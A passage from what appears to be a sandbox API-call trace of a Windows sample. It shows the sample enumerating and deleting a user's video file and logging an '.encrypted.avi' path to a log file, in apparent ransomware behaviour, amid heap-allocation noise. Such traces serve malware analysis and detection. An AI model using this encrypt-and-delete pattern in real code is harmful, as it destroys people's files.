cAlternateFileName="23EFG7~1.AVI")) returned 0x7c2240 [0042.854] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\23efg7fei5t7rrlh_.avi")) returned 1 [0042.856] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7389b590, ftCreationTime.dwHighDateTime=0x1d5bd91, ftLastAccessTime.dwLowDateTime=0x65634260, ftLastAccessTime.dwHighDateTime=0x1d5b6d9, ftLastWriteTime.dwLowDateTime=0x193fe5a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x10898, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="23efG7fei5t7RrlH_.avi", cAlternateFileName="23EFG7~1.AVI")) returned 0 [0042.856] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0042.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.856] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.856] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.856] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0042.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.856] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.857] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.857] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.857] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.857] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0042.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.857] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0042.857] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.857] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0042.857] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.857] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0042.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0042.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0042.858] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0042.858] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x35a1, lpOverlapped=0x0) returned 1 [0042.858] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0042.858] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x35a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.858] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0042.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0042.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0042.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.encrypted.avi\r\n", cchWideChar=86, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 86 [0042.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x56) returned 0x794b90 [0042.858] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.encrypted.avi\r\n", cchWideChar=86, lpMultiByteStr=0x794b90, cbMultiByte=86, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\23efG7fei5t7RrlH_.encrypted.avi\r\n", lpUsedDefaultChar=0x0) returned 86 [0042.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0042.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0042.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0042.858] WriteFile (in: hFile=0x128, lpBuffer=0x87a9d8*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87a9d8*, lpNumberOfBytesWritten=0x6aee3c*=0x55, lpOverlapped=0x0) returned 1 [0042.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0042.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0042.858] CloseHandle (hObject=0x128) returned 1 [0042.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0042.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0042.861] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0042.861] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0042.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.862] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0042.862] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.862] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0042.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0042.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0042.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.862] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0042.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0042.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0042.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0042.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0042.863] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0042.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0042.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0042.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.863] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0042.864] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0042.864] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0042.865] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0042.865] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0042.865] RtlAllocateHeap 